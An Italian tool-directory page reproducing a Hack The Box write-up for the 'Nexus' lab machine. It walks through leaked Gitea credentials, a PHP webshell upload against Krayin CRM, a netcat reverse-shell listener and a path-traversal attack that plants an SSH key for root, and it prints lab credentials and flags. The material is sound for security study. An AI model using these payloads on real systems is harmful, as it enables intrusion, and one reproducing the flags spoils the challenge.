Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
htb-labs-nexus — # Write-up della macchina Nexus di Hack The Box: ricognizione, scoperta di credenziali Gitea, sfruttamento di Krayin CRM tramite CVE-2026-38526, accesso iniziale ed escalation dei privilegi attraverso un servizio vulnerabile di sincronizzazione dei template Gitea. | Kitploit
Strumenti/GitHubGitHub/diegorivas1/htb-labs-nexus
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebCTFPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Lab e Pratica
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

# Write-up della macchina Nexus di Hack The Box: ricognizione, scoperta di credenziali Gitea, sfruttamento di Krayin CRM tramite CVE-2026-38526, accesso iniziale ed escalation dei privilegi attraverso un servizio vulnerabile di sincronizzazione dei template Gitea.

Vedi Repository
8h 2m faNon ancora revisionato

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 Panoramica

Nexus è una macchina Linux di difficoltà Facile di Hack The Box che dimostra una catena di attacco multi-fase che coinvolge enumerazione di virtual host, credenziali esposte, funzionalità vulnerabili di applicazioni web, esecuzione remota di codice, riutilizzo di credenziali ed escalation locale dei privilegi.

Catena di Attacco

root@kitploit:~
Ricognizione
      │
      ▼
Enumerazione Virtual Host
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Cronologia Commit Gitea
              │
              ▼
       Credenziali Esposte
              │
              ▼
        Login Krayin CRM
              │
              ▼
      CVE-2026-38526
              │
              ▼
        Webshell PHP
              │
              ▼
       Reverse Shell
        (www-data)
              │
              ▼
       .env dell'Applicazione
              │
              ▼
        SSH come jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Path Traversal
              │
              ▼
    Repository Git Maligno
              │
              ▼
         SSH come root

Tecniche Chiave

  • 🔍 Enumerazione di virtual host
  • 🔑 Scoperta di credenziali tramite cronologia commit Git
  • 💻 Sfruttamento di Krayin CRM
  • 🐚 Webshell PHP e reverse shell
  • 🔐 Riutilizzo di credenziali
  • 🔬 Enumerazione dei servizi Linux
  • 📂 Path traversal
  • 🌳 Costruzione di repository Git maligno
  • 👑 Escalation dei privilegi a root

IP Target: 10.129.82.92


🔍 Fase 1 Ricognizione

Scansione delle Porte

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Risultati

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Enumerazione Virtual Host

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Host Scoperti

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Aggiungi gli host scoperti a /etc/hosts:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Fase 2 Scoperta delle Credenziali

Enumerazione Gitea

Naviga verso:

root@kitploit:~
http://git.nexus.htb

Un repository denominato:

root@kitploit:~
admin/krayin-docker-setup

contiene informazioni utili nella sua cronologia Git.

Il file .env può essere recuperato dai commit precedenti, rivelando credenziali che non sono più presenti nella versione corrente.

Credenziali Scoperte

ServizioNome UtentePassword
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

L'indirizzo email [email protected] è stato identificato anche nella sezione relativa al personale del sito web principale.


💻 Fase 3 CVE-2026-38526 : Krayin CRM

Login CRM

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

Email: [email protected]
Password: N27xh!!2ucY04

Caricamento della Webshell

Naviga verso:

root@kitploit:~
/admin/mail/sent

Poi:

  1. Clicca su Compose Mail.
  2. Allega il payload PHP.
  3. Intercetta la richiesta usando Burp Suite.
  4. Modifica il nome del file caricato.
  5. Cambia il tipo MIME.
  6. Inoltra la richiesta.

Il payload è memorizzato in:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Payload:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

I campi multipart rilevanti sono:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Webshell

Dopo il caricamento riuscito:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Risultato atteso:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Fase 4 Reverse Shell

Avvia un listener:

root@kitploit:~
nc -lvnp 4444

Poi attiva la reverse shell tramite la webshell caricata.

L'implementazione in Python è disponibile in:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

In questa fase la shell viene ottenuta come:

root@kitploit:~
www-data

🐚 Fase 5 Accesso Utente

Leggi la Configurazione dell'Applicazione

Ispeziona la configurazione di Krayin:

root@kitploit:~
cat /var/www/krayin/.env

Vengono trovate le credenziali:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Enumera gli Utenti

root@kitploit:~
cat /etc/passwd | grep sh$

Viene identificato l'account jones.

SSH come jones

root@kitploit:~
ssh [email protected]

Password:

root@kitploit:~
y27xb3ha!!74GbR

Flag Utente

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Fase 6 Escalation dei Privilegi

Enumera i Servizi

root@kitploit:~
systemctl list-units | grep -i gitea

Vengono identificati il seguente servizio e timer:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

Il servizio viene eseguito con privilegi elevati.

Script Vulnerabile

root@kitploit:~
/etc/gitea/template-sync.py

Il meccanismo di sincronizzazione utilizza una costruzione di percorsi che può essere sfruttata tramite path traversal.


🎯 Fase 7 Repository Git Maligno

Genera una coppia di chiavi SSH:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

Lo sfruttamento della manipolazione degli oggetti Git si trova in:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Crea il repository:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

Il repository deve utilizzare il ramo:

root@kitploit:~
main

Token Gitea

Genera un token di accesso personale tramite:

root@kitploit:~
http://git.nexus.htb

Naviga verso:

root@kitploit:~
Settings → Applications

Poi configura il remote:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Esegui il push del repository maligno:

root@kitploit:~
git push -f origin main

⏰ Fase 8 Sincronizzazione dei Template

Monitora il log di sincronizzazione:

root@kitploit:~
tail -f /var/log/template-sync.log

Una sincronizzazione riuscita comporta l'elaborazione dell'albero Git maligno da parte del servizio privilegiato.

Esempio:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 Fase 9 Root

Una volta che la chiave pubblica SSH è stata scritta nell'account root:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Verifica l'accesso:

root@kitploit:~
whoami

Atteso:

root@kitploit:~
root

Recupera la flag root:

root@kitploit:~
cat /root/root.txt

Flag Root

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Flag

FlagValore
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 Credenziali

Queste credenziali appartengono all'ambiente di laboratorio Hack The Box documentato da questo repository.


🛠️ Strumenti


📁 Struttura del Repository

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 Risorse Aggiuntive

  • CVE-2026-38526
  • Krayin CRM
  • Documentazione Gitea
  • OWASP Path Traversal

⚠️ Disclaimer

Questo repository è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati.

Le tecniche, le credenziali, gli exploit e i comandi documentati qui non devono essere utilizzati contro sistemi senza esplicita autorizzazione.


🎯 Punti Chiave

  1. 🔍 Enumera i Virtual Host: servizi importanti possono essere nascosti dietro sottodomini.
  2. 🔑 Controlla la Cronologia Git: rimuovere un segreto da un file non significa che sia sparito dalla cronologia del repository.
  3. 💻 Analizza i Caricamenti di File: la validazione dell'estensione e del tipo MIME può essere un controllo di sicurezza critico.
  4. 🐚 Enumera Dopo Aver Ottenuto una Shell: i file di configurazione possono contenere credenziali riutilizzabili.
  5. 🔬 Controlla i Servizi Privilegiati: un servizio eseguito come root può diventare un vettore di escalation dei privilegi.
  6. 📂 Valida Correttamente i Percorsi dei File: la gestione non sicura di percorsi controllati dall'utente può introdurre vulnerabilità di Path Traversal.
  7. 🌳 Git Può Diventare un Vettore di Attacco: gli oggetti e gli alberi Git possono essere manipolati quando un'applicazione si fida in modo errato della loro struttura.

🙏 Crediti

  • Hack The Box : Macchina e piattaforma di laboratorio
  • P3lured : Write-up originale
  • Tran Manh Tan : Guida complementare

⭐ Se hai trovato utile questo write-up, considera di mettere una stella al repository.

Scarica lo strumento
ServizioNome UtentePassword / Chiave
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Token Giteajones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
StrumentoScopo
NmapEnumerazione di porte e servizi
GobusterEnumerazione di virtual host
Burp SuiteIntercettazione e modifica delle richieste HTTP
GitAnalisi dei repository e costruzione di repository maligni
Python 3Script di sfruttamento
NetcatListener per reverse shell
LinEnumEnumerazione Linux
LinPEASEnumerazione per escalation dei privilegi
SSHAccesso remoto